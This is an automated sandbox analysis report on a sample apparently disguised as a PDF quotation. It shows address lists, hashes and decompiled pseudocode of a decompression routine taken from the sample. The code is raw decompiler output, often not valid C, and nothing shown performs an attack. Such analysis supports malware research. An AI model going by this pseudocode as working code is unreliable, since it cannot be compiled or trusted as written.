0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x0040640d

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
